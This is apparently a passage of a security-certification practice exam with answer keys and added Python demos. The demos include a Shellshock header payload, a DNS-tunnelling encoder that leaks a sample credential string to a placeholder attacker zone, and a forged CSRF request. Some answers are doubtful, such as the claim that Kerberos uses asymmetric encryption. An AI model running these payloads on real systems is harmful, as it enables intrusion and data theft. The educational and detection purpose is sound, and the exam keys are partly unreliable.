Your team is testing a server that serves PHP pages for the Shellshock vulnerability. Which of the following actions should you take?
Correct answer:
Send specially created environment variables and trailing commands is correct. Shellshock (CVE-2014-6271 and its follow-ups) is a bash bug: when bash imports an environment variable whose value begins with "() {", it parses the value as a function definition, and vulnerable versions also execute any commands that follow the closing brace. A PHP site is exposed wherever attacker-controlled request data reaches bash through the environment, most commonly a CGI handler (request headers such as User-Agent become HTTP_* variables) or a PHP script that spawns a shell with system() or popen() on a host where /bin/sh is bash.
Incorrect answers:
All other answers are incorrect. These answers do not describe the Shellshock vulnerability.
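The check a tester would actually run, as an added example that is not from the original page: a Python function that asks the local bash whether it executes the trailing command from an environment-variable function definition, plus the request headers that carry the same payload to a CGI endpoint (a CGI server copies each header into an HTTP_* environment variable before calling the handler). The payload only echoes a marker string; the variable name PROBE and the marker text are placeholders.

```python
"""Added example (not from the original page): probe a local bash binary for
the Shellshock function-import bug and build the HTTP headers a tester would
send to a CGI endpoint. The payload is benign: it only echoes a marker."""

import os
import shutil
import subprocess
from typing import Optional

MARKER = "shellshock-marker"                 # constructed marker string
# A bash function definition in an environment variable, followed by a
# trailing command. Vulnerable bash runs the trailing command while importing.
PAYLOAD = "() { :; }; echo " + MARKER


def bash_imports_trailing_command(bash: Optional[str] = None) -> Optional[bool]:
    """Return True if the given bash executes the trailing command from an
    environment-variable function definition, False if it is patched, and
    None if no bash is available to test."""
    bash = bash or shutil.which("bash")
    if not bash:
        return None
    env = dict(os.environ, PROBE=PAYLOAD)    # PROBE is an arbitrary variable name
    # 'bash -c :' prints nothing itself, so any marker on stdout came from the
    # environment import, not from the command we asked bash to run.
    proc = subprocess.run([bash, "-c", ":"], env=env,
                          capture_output=True, text=True)
    return MARKER in proc.stdout


def cgi_probe_headers() -> dict:
    """Headers a CGI server turns into HTTP_USER_AGENT, HTTP_REFERER and
    HTTP_COOKIE in the handler's environment, each carrying the payload."""
    return {"User-Agent": PAYLOAD, "Referer": PAYLOAD, "Cookie": PAYLOAD}


if __name__ == "__main__":
    print("local bash vulnerable:", bash_imports_trailing_command())
    print("probe headers:", cgi_probe_headers())
```

Against a patched bash the local check returns False because bash no longer interprets arbitrary variables as function definitions (only specially named BASH_FUNC_* variables are imported, and trailing commands are never executed). When the headers are sent to a vulnerable CGI script, the marker shows up in the HTTP response body or in the server log, which is the signal a pentester looks for.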
Question 62 of 100
62. Question
A pen test specialist is running netcat to transfer a file between two hosts and becomes concerned the traffic is being sniffed. Which of the following methods is the best way to ensure the transfer is protected from sniffing?
Correct answer:
Use CryptCat instead is correct. CryptCat is a netcat variant that encrypts the channel (Twofish, keyed from a shared passphrase), so a sniffer on the path sees only ciphertext.
Incorrect answers:
Traffic on a switched network can still be sniffed (ARP poisoning, port mirroring, or a compromised switch all defeat the assumption that switches isolate traffic).
Promiscuous mode on the NIC controls what the sniffer captures; it has nothing to do with encrypting what is sent.
The -e option in netcat executes a program once the connection is made; it does nothing for encryption.
Question 63 of 100
63. Question
Which of the following statements is true?
Correct Answer:
Both "Sniffers operate at Layer 2 of the OSI model" and "Sniffers operate at Layer 3 of the OSI model" are correct. A sniffer captures whole frames and decodes them from Layer 2 up: Layer 2 provides physical addressing and framing (MAC addresses, Ethernet frames, and so on), and Layer 3 carries the packets and payloads (IP addressing and such).
Incorrect Answers:
Sniffers operate at Layer 1 of the OSI model, Sniffers operate at Layer 2 of the OSI model, and Sniffers operate at Layer 3 of the OSI model are incorrect.
Technically nothing works without Layer 1, but that is not what is being asked here. The Layer 2 and Layer 3 answers are each true on their own, but the combined answer is the best one.
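The two layers just described, decoded in Python as an added example that is not from the original page: an Ethernet frame parser (Layer 2: MAC addresses and EtherType) and an IPv4 header parser (Layer 3: addresses, TTL, protocol), with the header checksum verified. The frame is built inline rather than captured, and the MAC and IP addresses in it are placeholders.

```python
"""Added example (not from the original page): what a sniffer decodes at
Layer 2 and Layer 3. The frame below is constructed by hand, not captured."""

import socket
import struct


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_ethernet(frame: bytes) -> dict:
    """Layer 2: 6-byte destination MAC, 6-byte source MAC, 2-byte EtherType."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    return {"dst_mac": mac_str(dst), "src_mac": mac_str(src),
            "ethertype": ethertype, "payload": frame[14:]}


def parse_ipv4(packet: bytes) -> dict:
    """Layer 3: the fixed 20-byte header fields a sniffer displays."""
    (ver_ihl, tos, total_len, ident, flags_frag, ttl, proto, csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (ver_ihl & 0x0F) * 4                 # header length in bytes
    return {"version": ver_ihl >> 4, "header_len": ihl, "total_len": total_len,
            "ttl": ttl, "protocol": proto,
            "src_ip": socket.inet_ntoa(src), "dst_ip": socket.inet_ntoa(dst),
            "payload": packet[ihl:total_len]}


def ipv4_checksum(header: bytes) -> int:
    """One's-complement sum over the header; over a header that already
    carries its checksum the result is 0 when the header is intact."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def decode_frame(frame: bytes) -> dict:
    """Layer 2 first, then Layer 3 if the EtherType says IPv4."""
    eth = parse_ethernet(frame)
    if eth["ethertype"] != 0x0800:             # only IPv4 handled in this demo
        return {"l2": eth, "l3": None}
    ip = parse_ipv4(eth["payload"])
    ip["checksum_ok"] = ipv4_checksum(eth["payload"][:ip["header_len"]]) == 0
    return {"l2": eth, "l3": ip}


def build_demo_frame() -> bytes:
    """Constructed sample: Ethernet / IPv4 / UDP (DNS ports) carrying 'hello'."""
    udp = b"\x00\x35\x00\x35\x00\x0d\x00\x00" + b"hello"   # 8-byte header + data
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0x1234, 0x4000,
                      64, 17, 0,                          # TTL 64, proto 17 = UDP
                      socket.inet_aton("192.168.1.10"),   # placeholder addresses
                      socket.inet_aton("192.168.1.1"))
    hdr = hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]
    eth = struct.pack("!6s6sH", bytes.fromhex("001122334455"),
                      bytes.fromhex("66778899aabb"), 0x0800)
    return eth + hdr + udp


if __name__ == "__main__":
    d = decode_frame(build_demo_frame())
    print(d["l2"]["src_mac"], "->", d["l2"]["dst_mac"])
    print(d["l3"]["src_ip"], "->", d["l3"]["dst_ip"], "ttl", d["l3"]["ttl"])
```

The same unpack-by-offset pattern continues upward (the UDP header sits in the IPv4 payload), which is why a sniffer that "operates at Layers 2 and 3" still shows you ports and application data: everything above is just more bytes in the frame it already holds.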
Question 64 of 100
64. Question
Your client has encrypted communications between two segments using SSL. They are concerned about possible intrusion attempts and install an IDS between the two to monitor the traffic. You advise against this for what reason?
Correct answer:
The IDS is blind to SSL traffic is correct. Encryption is the nemesis of a signature-based IDS: once the TLS (SSL) handshake completes, the application data passing the sensor is ciphertext, so no payload signature can match. The sensor still sees flow metadata and the handshake (addresses, ports, the server name in the ClientHello, and in TLS 1.2 the server certificate), which helps with spotting where traffic goes but not what it carries. To inspect content, terminate TLS in front of the sensor or give it the session keys.
Incorrect answers:
All other answers are incorrect. SSL does not affect false positives or negatives, and an IDS certainly does not fail because it sniffs passively.
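What the sensor can and cannot read, shown in Python as an added example that is not from the original page: a constructed TLS ClientHello carrying a server_name extension, a parser that pulls the SNI out of it (metadata the IDS still sees), and an application-data record whose payload is opaque. The hostname, cipher suite and record bytes are constructed for the demo, and the parser handles only what the demo needs (a single unfragmented record).

```python
"""Added example (not from the original page): why an IDS on a TLS link is
blind to the payload yet still sees handshake metadata such as the SNI.
The ClientHello below is constructed, not captured."""

import struct


def build_client_hello(hostname: str) -> bytes:
    """Minimal TLS 1.2 ClientHello record with one cipher suite and an SNI."""
    name = hostname.encode()
    sni_entry = b"\x00" + struct.pack("!H", len(name)) + name      # name_type host_name
    sni_data = struct.pack("!H", len(sni_entry)) + sni_entry          # ServerNameList
    sni_ext = struct.pack("!HH", 0x0000, len(sni_data)) + sni_data    # extension type 0
    extensions = struct.pack("!H", len(sni_ext)) + sni_ext
    body = (b"\x03\x03" + bytes(32)            # client_version, random (zeros here)
            + b"\x00"                          # empty session id
            + struct.pack("!H", 2) + b"\xc0\x2f"   # one cipher suite
            + b"\x01\x00"                      # one compression method: null
            + extensions)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(record: bytes):
    """Return the server_name from a ClientHello record, or None if the record
    is not a ClientHello (e.g. encrypted application data) or has no SNI."""
    if len(record) < 5 or record[0] != 0x16:            # 0x16 = handshake record
        return None
    hs = record[5:5 + struct.unpack("!H", record[3:5])[0]]
    if not hs or hs[0] != 0x01:                         # 0x01 = client_hello
        return None
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    pos = 2 + 32                                        # skip version and random
    pos += 1 + body[pos]                                # session id
    (cs_len,) = struct.unpack("!H", body[pos:pos + 2]); pos += 2 + cs_len
    pos += 1 + body[pos]                                # compression methods
    if pos + 2 > len(body):
        return None                                     # no extensions block
    (ext_len,) = struct.unpack("!H", body[pos:pos + 2]); pos += 2
    end = pos + ext_len
    while pos + 4 <= end:
        ext_type, length = struct.unpack("!HH", body[pos:pos + 4]); pos += 4
        data = body[pos:pos + length]; pos += length
        if ext_type == 0x0000:                          # server_name extension
            (list_len,) = struct.unpack("!H", data[:2])
            q = 2
            while q + 3 <= 2 + list_len:
                name_type = data[q]
                name_len = struct.unpack("!H", data[q + 1:q + 3])[0]
                q += 3
                if name_type == 0:
                    return data[q:q + name_len].decode("ascii", "replace")
                q += name_len
    return None


def ids_view(record: bytes) -> dict:
    """What a passive sensor can say about one TLS record."""
    if record[0] == 0x17:          # application_data: the payload is ciphertext
        return {"type": "application_data", "sni": None, "payload_visible": False}
    return {"type": "handshake", "sni": extract_sni(record), "payload_visible": False}


if __name__ == "__main__":
    print(ids_view(build_client_hello("intranet.example.com")))
    print(ids_view(b"\x17\x03\x03\x00\x05" + b"\x8a\x11\x09\xde\xad"))
```

The first print shows the sensor learning the requested host name from the handshake; the second shows an application-data record where nothing but length and timing is available. Encrypted ClientHello (ECH) in newer deployments hides even the SNI, which pushes detection further toward flow metadata or TLS termination.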
Question 65 of 100
65. Question
You are concerned a machine (192.168.15.12) on the network does not seem to be sending logs to a system running syslog (192.168.15.90). Which of the following filters is the best choice to see if the system is sending messages to the syslog server?
Correct answer:
tcp.dstport==514 && ip.dst==192.168.15.90 is correct. The syslog port (514) is matched on the destination port (tcp.dstport) and the syslog server's address (192.168.15.90) on the destination IP (ip.dst), so the filter shows only traffic heading to the collector. Note that classic syslog runs over UDP port 514; TCP 514 is used by some forwarders and TLS-protected syslog uses 6514, so in a live capture match the transport the client is actually configured for (udp.dstport==514 for the UDP case).
Incorrect answers:
All other answers are incorrect. These answers do not match the correct filter syntax.
Question 66 of 100
66. Question
You have an FTP service and an HTTP site on a single server. Which DNS record allows you to alias both services to the same record (IP address)?
Correct answer:
CNAME is correct. A CNAME (canonical name) record makes one name an alias of another, so names such as ftp.example.com and www.example.com can both point at the single host name that owns the A record; changing the address then means changing one record. A name that holds a CNAME may not hold any other record type, which is why a zone apex cannot be a CNAME.
Incorrect answers:
All other answers are incorrect. NS (name server), SOA (start of authority), and PTR (pointer, used for reverse lookups) records do not alias anything.
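How a resolver follows those aliases, in Python as an added example that is not from the original page: the two service names are CNAMEs to one host that owns the A record, and the lookup also catches the two failure modes a defender cares about, an alias chain that loops and an alias whose target has no records. The zone and its names are constructed placeholders.

```python
"""Added example (not from the original page): chasing CNAME aliases so that
ftp. and www. both resolve to one address record. The zone is constructed."""

MAX_CHAIN = 8   # real resolvers cap CNAME chasing to stop runaway chains

# constructed zone: owner name -> list of (type, rdata)
ZONE = {
    "host1.example.com.":  [("A", "203.0.113.10")],
    "www.example.com.":    [("CNAME", "host1.example.com.")],
    "ftp.example.com.":    [("CNAME", "host1.example.com.")],
    "old.example.com.":    [("CNAME", "retired.example.com.")],  # target has no data
    "loop-a.example.com.": [("CNAME", "loop-b.example.com.")],
    "loop-b.example.com.": [("CNAME", "loop-a.example.com.")],
}


def lookup(name: str, rtype: str, zone: dict = ZONE) -> dict:
    """Resolve rtype for name, chasing CNAMEs. Returns the chain walked and the
    final answers, or an error for dangling or looping aliases."""
    chain = [name]
    for _ in range(MAX_CHAIN):
        rrset = zone.get(name, [])
        cnames = [rd for t, rd in rrset if t == "CNAME"]
        if cnames:
            # RFC 1034: a CNAME owner must not carry other record types
            if any(t != "CNAME" for t, _rd in rrset):
                return {"chain": chain, "answers": [], "error": "CNAME with other data"}
            name = cnames[0]
            chain.append(name)
            if chain.count(name) > 1:
                return {"chain": chain, "answers": [], "error": "CNAME loop"}
            continue
        answers = [rd for t, rd in rrset if t == rtype]
        if not answers and len(chain) > 1:
            return {"chain": chain, "answers": [], "error": "dangling CNAME"}
        return {"chain": chain, "answers": answers, "error": None}
    return {"chain": chain, "answers": [], "error": "chain too long"}


if __name__ == "__main__":
    for n in ("www.example.com.", "ftp.example.com.",
              "old.example.com.", "loop-a.example.com."):
        print(n, lookup(n, "A"))
```

The dangling case is worth keeping in the output: an alias left pointing at a hosted service that has since been deprovisioned is the precondition for subdomain takeover, so "CNAME whose target returns nothing" is a finding, not just a misconfiguration.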
Question 67 of 100
67. Question
Which of the following represents the highest risk to an organization?
Correct answer:
Disgruntled employee is correct. It's bad enough that external attackers try to break into the network, but what about the people already on it? A disgruntled employee is a serious threat because he already has connectivity, valid credentials and, depending on the job, access to otherwise protected areas, so the perimeter defenses never come into play.
Incorrect answers:
A black hat is an external, malicious attacker.
A white hat is an ethical hacker working with permission.
A gray hat doesn't work under an agreement but isn't necessarily malicious.
Question 68 of 100
68. Question
Your organization’s leadership wants security to monitor all traffic coming into and out of the network for malicious intent. Which of the following should you implement?
Correct Answer:
Network-based IDS is correct.
An intrusion detection system is what's being called for here, and a NIDS (network IDS) watches all traffic on the segments it is attached to. Sensor placement is critical: if the sensor is not tapped at a point (or points) that all traffic flows through, it will not see everything.
Incorrect Answers:
Host-based IDS, Firewall, and Proxy are incorrect.
Host-based IDS gets the IDS part right but misses with "host": a HIDS monitors only the system it is installed on, not an entire subnet.
Firewalls aren't used for this purpose; they're designed to allow and block specific traffic, not to analyze everything for malicious intent.
A proxy is used either as something to hide behind when you're on the outside trying to get in, as an anonymizing front from internal to external, or as a cache that internal machines can hit instead of going outside the subnet.
Question 69 of 100
69. Question
A client wants the best platform for software development. Which cloud service type best meets his needs?
Correct Answer:
PaaS is correct.
Platform as a Service (PaaS) is geared toward software development: it provides a hosted development and runtime platform, so subscribers can build and launch applications without standing up the infrastructure that would normally take. The hardware and the platform software are hosted by the provider, so customers do not have to install or build their own for development work. PaaS doesn't usually replace an organization's own infrastructure; it offers services the organization may not have onsite.
Incorrect Answers:
IaaS, SaaS, and Hypervisor are incorrect.
Infrastructure as a Service (IaaS) provides virtualized computing resources (machines, storage, networks) over the Internet. Software as a Service (SaaS) is a software distribution model in which the provider offers on-demand applications to subscribers over the Internet. A hypervisor is the software that runs virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM); it is a virtualization component, not a cloud service model.
Question 70 of 100
70. Question
Which of the following describes a transmission channel that is being used in a manner in which it was not intended?
Correct answer:
Covert channel is correct. A covert channel is a transmission method used in a way for which it was not intended, generally to hide data transfers and/or violate security policy (for example, tunneling data in DNS query names or ICMP payloads, or signaling through packet timing).
Incorrect answers:
An overt channel is one that's used as designed and within policy.
A wrapper is the application used to hide a Trojan by binding it to a legitimate file.
Hidden channel is a distractor.
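The DNS form of a covert channel, in Python as an added example that is not from the original page: the sender hides data in query names under a zone it controls (the recursive resolver forwards them to the attacker's name server whether or not egress is otherwise blocked), the receiver reassembles them, and a defender-side check flags the long, high-entropy labels that real host names rarely have. The carrier zone, the sample secret and the detection thresholds are constructed placeholders.

```python
"""Added example (not from the original page): a covert channel riding on DNS
query names, with the receiver's decoder and a simple detection heuristic."""

import base64
import math
from collections import Counter

CARRIER = "cdn-metrics.example."   # attacker-controlled zone (placeholder)
CHUNK = 40                          # base32 chars per label; DNS labels max out at 63


def encode_queries(data: bytes) -> list:
    """Split data into base32 chunks and emit one query name per chunk:
    <seq>.<chunk>.<carrier>. Looking these up leaks the data via the resolver."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    chunks = [b32[i:i + CHUNK] for i in range(0, len(b32), CHUNK)]
    return [f"{seq}.{chunk}.{CARRIER}" for seq, chunk in enumerate(chunks)]


def decode_queries(names: list) -> bytes:
    """Receiver side (the attacker's name server): order by sequence number,
    join the chunks and undo the base32."""
    parts = sorted((int(n.split(".")[0]), n.split(".")[1]) for n in names)
    b32 = "".join(chunk for _, chunk in parts).upper()
    b32 += "=" * (-len(b32) % 8)    # restore the padding stripped by the sender
    return base64.b32decode(b32)


def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def suspicious(qname: str, max_label: int = 20, min_entropy: float = 3.0) -> bool:
    """Flag queries whose labels left of the registered domain look like
    encoded data rather than host names: long and high-entropy. Thresholds
    are illustrative; production detectors also count distinct subdomains per
    zone and query volume per client."""
    labels = qname.rstrip(".").split(".")
    return any(len(l) > max_label and entropy(l) > min_entropy for l in labels[:-2])


if __name__ == "__main__":
    secret = b"user=admin;pass=hunter2;token=9f3c1a7e5b"   # constructed sample
    qs = encode_queries(secret)
    print("\n".join(qs))
    print("round trip ok:", decode_queries(qs) == secret)
    for q in qs + ["www.example.com.", "mail.google.com."]:
        print(suspicious(q), q)
```

Every label stays under the 63-byte DNS limit, so a standards-compliant resolver passes the queries along; the only thing that distinguishes them from ordinary lookups is their shape, which is what the heuristic keys on.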
Question 71 of 100
71. Question
Which of the following best represents SOA?
Correct Answer:
An API that allows different components to communicate is correct.
Service-Oriented Architecture (SOA) is about software components delivering services to one another over a network, and this is the best available answer. In SOA, components of an application provide services to other components through a communications protocol, and the principles are independent of vendor, product, or technology.
Incorrect Answers:
A file server, An application containing both the user interface and the code allowing access to the data, and A single database accessed by multiple sources are incorrect.
A file server is just storage, a monolithic application that bundles the UI with its data access is the opposite of service decomposition, and a shared database is a data tier rather than a service interface; none of these describes SOA.
Question 72 of 100
72. Question
Which of the following can be compared to a CSRF attack?
Correct answer:
Session riding is correct. Session riding is, in effect, CSRF under a different name: the attacker gets the victim's browser to send a request to a site where the victim is already authenticated, and the browser attaches the session cookie automatically. The term is used in the cloud-services context rather than the traditional data center.
Incorrect answers:
A side-channel attack, also called a cross-guest VM breach, is a co-resident VM extracting information from another tenant through shared hardware such as CPU caches; it has nothing to do with forged requests.
Side session and VM straddling are not legitimate terms.
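The session-riding mechanics and the fix, in Python as an added example that is neither from the original page nor from any web framework: a transfer handler that trusts the session cookie alone beside one that also checks the request origin and a per-session anti-CSRF token compared in constant time. Requests and sessions are constructed dicts, and the site names are placeholders.

```python
"""Added example (not from the original page): the request pattern behind
session riding / CSRF and the server-side checks that defeat it."""

import hmac
import secrets

TRUSTED_ORIGIN = "https://bank.example"   # placeholder site name


def new_session(user: str) -> dict:
    """Session created at login; the token is bound to this session only."""
    return {"user": user, "csrf_token": secrets.token_urlsafe(32), "transfers": []}


def transfer_vulnerable(session: dict, request: dict) -> str:
    """Authenticates by the session cookie alone: a form auto-submitted from
    any site the victim visits rides on that cookie and succeeds."""
    session["transfers"].append((request["form"]["to"], int(request["form"]["amount"])))
    return "ok"


def transfer_hardened(session: dict, request: dict) -> str:
    """Require (1) a request-origin check and (2) the per-session token that
    the attacker's page cannot read, compared in constant time."""
    origin = request["headers"].get("Origin") or request["headers"].get("Referer", "")
    if not origin.startswith(TRUSTED_ORIGIN):
        return "rejected: cross-site origin"
    supplied = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(supplied, session["csrf_token"]):
        return "rejected: bad csrf token"
    session["transfers"].append((request["form"]["to"], int(request["form"]["amount"])))
    return "ok"


def forged_request() -> dict:
    """What the victim's browser sends when an attacker page auto-submits a
    form: the cookie goes along automatically, but Origin is the attacker's
    site and the token is unknown to the attacker."""
    return {"headers": {"Origin": "https://evil.example", "Cookie": "session=abc"},
            "form": {"to": "attacker", "amount": "5000"}}


def legitimate_request(session: dict) -> dict:
    """A form submitted from the real site, carrying the token it rendered."""
    return {"headers": {"Origin": TRUSTED_ORIGIN, "Cookie": "session=abc"},
            "form": {"to": "landlord", "amount": "900",
                     "csrf_token": session["csrf_token"]}}


if __name__ == "__main__":
    s = new_session("alice")
    print(transfer_vulnerable(s, forged_request()), s["transfers"])
    s = new_session("alice")
    print(transfer_hardened(s, forged_request()), s["transfers"])
    print(transfer_hardened(s, legitimate_request(s)), s["transfers"])
```

Both checks matter: the Origin check alone fails for clients that strip the header, and the token alone is enough only if it is never exposed cross-origin; setting the session cookie with SameSite=Lax or Strict adds a third, browser-enforced layer.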
Question 73 of 100
73. Question
A user with appropriate credentials enters the following command: net use F: \\ECCCOMPUTER\BankFiles /persistent:yes. Which of the following statements are true regarding this command? (Choose all that apply.)
Correct answers:
"In Windows Explorer, a drive will appear denoted as BankFiles (\\ECCCOMPUTER) (F:)" and "the mapped drive will remain mapped after a reboot" are correct. This command connects to the shared folder BankFiles on ECCCOMPUTER and presents it as drive F: on the local machine. The /persistent:yes switch makes the mapping reconnect at every logon (Windows stores it under the user's HKCU\Network key) until it is removed with net use F: /delete.
Incorrect answers:
All other answers are incorrect. These do not reflect the outcome of the command.
Question 74 of 100
Which of the following statements best defines smishing?
Correct answer:
It is sending SMS texts to a user in an effort to trick them into downloading malicious code is correct. Smishing comes from cramming SMS (texting) and phishing together. “Smishing,” get it? The idea is the same as with phishing, except you use text messaging to trick users into downloading stuff.
Incorrect answers:
All other answers are incorrect. These statements do not apply to smishing.
Question 75 of 100
A senior leader asks the security team what measures can be taken to discover sniffers on the network. Which of the following statements is true regarding sniffers?
Correct Answer:
It is almost impossible to discover a sniffer on the network is correct.
While not impossible, sniffer discovery _is_ difficult. If the sniffer is implanted somewhere on the network using a device with an IP address, it may be possible to find it (the system it’s running on will have _some_ record of it somewhere). However, many network taps are passive and have no address at all. A NIC just pulling packets in won’t necessarily alert anything or provide any triggers for watchful eyes. However, active sniffing, where MAC flooding or ARP spoofing is being used, is another thing altogether.
Incorrect Answers:
Pinging all addresses and examining response latency will discover a sniffer, Sending ARP messages to all systems and watching for NOARP responses will discover a sniffer, and Configuring the IDS to watch for NICs in promiscuous mode will discover sniffers are incorrect.
Latency in a ping response has nothing to do with sniffing; NOARP is a Linux kernel module, and it’s impossible to see a NIC in promiscuous mode from a monitoring station (unless you’re on the system itself and looking at the NIC properties).
Question 76 of 100
Which of the following is best known for replacing notepad.exe on Windows systems?
Correct answer:
TROJ_QAZ is correct. TROJ_QAZ replaces notepad.exe on the system in an effort to hide. It also drops into the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run startIE = “{malware path and file name} qaz”.
Incorrect answers:
SubRoot, from 2009, creates a full-control back door over port 1700 (TCP).
Restorator is a defacement Trojan.
Biodox is a GUI full remote-control Trojan.
Question 77 of 100
On a Windows-based machine, which switch can be used in ping to set the size of the echo request packet?
Correct Answer:
-l is correct. The -l switch allows you to change the default packet size of an echo request leaving your machine. The default packet size leaving a Windows machine is 32 bytes.
Incorrect Answers:
The -a switch resolves addresses to hostnames.
The -s switch provides a timestamp for count hops.
The -t switch indicates the ping will continue until stopped.
Question 78 of 100
Which of the following commands is used to open a collection of Windows administrative tools that you can use to manage a local or remote computer?
Correct answer:
compmgmt.msc is correct. Compmgmt.msc is used to open the Computer Management console, which holds all sorts of tools to manage the machine. This can be done on the local machine or, assuming you have rights and a proper network connection, a remote system. You can run any MMC in 64- or 32-bit mode (using the /64 or /32 switches, respectively).
Incorrect answers:
The Services MMC is opened by services.msc.
gpedit (.msc) opens the Group Policy Editor.
ncpa.cp does not exist.
Question 79 of 100
Which of the following statements is true?
Correct Answer:
Pcap is used on Windows. Libpcap is used on Linux is correct.
Pcap (for Windows) and its Linux-based brother libpcap are the packet capture libraries/drivers used by virtually every sniffing and scanning tool you can think of—nmap, Snort, Wireshark, tcpdump, kismet, and L0phtCrack, for example. For extra fun—and possibly a _Jeopardy_-type question on your exam—libpcap was written in C/C++.
Incorrect Answers:
Pcap is an encryption algorithm, Pcap is used on Linux. Libpcap is used on Windows, and Pcap is a command-line tool for sniffing are incorrect.
The other answers provided are not true regarding Pcap.
Question 80 of 100
Which of the following should be included in a security policy? (Choose all that apply.)
Correct answers:
References to supporting documents, policy exceptions, and noncompliance disciplinary actions are correct. A security policy defines everything about your security layout for your employees. Of course it will include references to all sorts of documentation (such as lists of allowed hardware and software as well as locations for related policies and procedures), exceptions (hopefully few, but there will be some), and what happens to employees should they decide to stray from the policy.
Incorrect answers:
Procedures is incorrect. Procedures and technical details will be found in procedure documents, not in the security policy itself.
Question 81 of 100
A security admin has turned on MAC filtering on a WAP. Which of the following is the best way to bypass this activity?
Correct Answer:
MAC spoofing is correct. So the admin says, “Only allow these MAC addresses to connect,” and the WAP is secure, right? Sure. And I have a future as an NBA player. Simply sniff traffic until you find a MAC that works and spoof it. Voilà!
Incorrect Answers:
ARP spoofing, DNS poisoning, and IP spoofing are incorrect.
ARP won’t do any good here—you can use it to misdirect traffic but not to authenticate.
DNS poisoning works with name resolution and has no place here.
IP spoofing is on the right track, but MAC filtering is done at Layer 2, so it wouldn’t work here.
Question 82 of 100
Two different organizations have their own public key infrastructure up and running. When the two companies merged, security personnel wanted both PKIs to validate certificates from each other. What must the CAs for both companies establish to accomplish this?
Correct answer:
Cross-certification is correct. When PKIs need to talk to one another and trust certificates from either side, the CAs need to set up a mutual trust known as “cross-certification.”
Incorrect answers:
All other answers are incorrect. These terms are not valid.
Question 83 of 100
You want to run a reliable scan but remain as stealthy as possible. Which of the following nmap commands accomplishes your goal best?
Correct answer:
nmap -sS targetIPaddress is correct. A full-connect scan would probably be best, provided you run it slowly. However, given the choices, a half-open scan, as defined by this nmap command line, is the best remaining option. In the interest of running it slowly, you could certainly add a -T# flag. A scan using -sO -T4 is wild, is fast, and undoubtedly causes all sorts of alerts. Swap it out for a -T2 flag, and you’re running much more quietly. In the real world, a full-connect scan would result in plenty of logs to alert watchful eyes of something amiss going on, while half-open scans will almost certainly do the same. It’s a virtual toss-up, but for either choice, speed (or lack thereof) is your best option.
Incorrect answers:
A null scan (-sN) probably won’t provide the reliability asked for since it doesn’t work on Windows hosts at all.
An operating system (-sO) scan would prove too noisy here.
A full scan (-sT) would provide reliable results, but without a timing modifier to greatly slow it down, it will definitely be seen.
Question 84 of 100
Which of the following best describes an effort to maintain the communications channel between the two entities in hopes of sniffing valuable data?
Correct answer:
Man in the middle is correct. This correctly describes a man-in-the-middle attack. The idea of a man-in-the-middle attack is to maintain the communications channel between the two entities in hopes of sniffing valuable data.
Incorrect answers:
Polymorphic is a virus type.
Proxy sitter is a distractor.
Session hijacking would have knocked one of the participants out of the communications channel.
Question 85 of 100
Which of the following tools allow for Bluetooth device discovery? (Choose two.)
Correct answers:
BlueScanner and BT Browser are correct. BlueScanner (from SourceForge) does a great job of finding devices around you, and can also try to extract and display as much information as possible. BT Browser is another great, and well-known, tool for finding and enumerating nearby devices.
Incorrect answers:
BBProxy is a BlackBerry-centric tool that’s useful in an attack called Blackjacking.
PhoneSnoop is good for spyware on a BlackBerry.
Question 86 of 100
You hire guards and post guard dogs on the property. Which kind of security measure have you put into place?
Correct answer:
Physical is correct. Physical measures include all the things you can touch, taste, smell, or get shocked by. Examples of physical controls include bollards, lighting, locks, fences, and guards with Tasers or accompanied by angry German Shepherds.
Incorrect answers:
Technical measures are taken with technology in mind to protect explicitly at the physical level (smartcards and biometrics, for example).
Operational measures are the policies and procedures you set up to enforce a security-minded operation.
Aggressive is not a valid security control measure.
Question 87 of 100
Which of the following statements is true regarding Kerberos?
Correct answers:
All the above is correct. Kerberos makes use of both symmetric and asymmetric encryption technologies to securely transmit passwords and keys across a network. The entire process consists of a key distribution center (KDC), an authentication service (AS), a ticket granting service (TGS), and the ticket granting ticket (TGT). It can make use of both TCP and UDP and runs over port 88.
Incorrect answers:
Because all these are true statements, none can individually be the correct answer.
Question 88 of 100
A security team member enters the following: `nmap -d --script ssl-heartbleed --script-args vulns.showall -sV [host]` Which of the following would you expect to see returned?
Correct answer:
A return of “State: NOT VULNERABLE” on systems protected against Heartbleed is correct. You can use the nmap command “nmap -d --script ssl-heartbleed --script-args vulns.showall -sV [host]” to search for the vulnerability; the returned message will say “State: NOT VULNERABLE” if you’re good to go.
Incorrect answers:
All other answers are incorrect. The remaining answers do not match the command provided.
Question 89 of 100
An attacker sends SMS text messages crafted to appear as legitimate security notifications, with a phone number provided. The user unwittingly calls the number and provides sensitive data in response. Which of the following correctly describes this attack?
Correct answer:
Smishing is correct. Smishing refers to an attack using SMS text messages crafted to appear as legitimate security notifications, with a phone number provided. The user unwittingly calls the number and provides sensitive data in response.
Incorrect answers:
Vishing refers to using a phone in social engineering.
Phishing uses e-mail.
Text attack is not a valid term.
Question 90 of 100
Which of the following best describes an effort to identify systems that are critical for continuation of operation for the organization?
Correct answer:
BIA is correct. The business impact analysis (BIA) best matches this description.
Incorrect answers:
Digital signatures, good authentication measures, and solid password policy are all great things to have; however, none of them identify critical systems.
Question 91 of 100
During a pen test, you notice VoIP traffic is traversing the subnet. Which of the following tools could be used to decode a packet capture and extract voice conversations?
Correct answer:
Cain is correct. Cain (and Abel) can do all sorts of great stuff, including extracting voice from VoIP captures.
Incorrect answers:
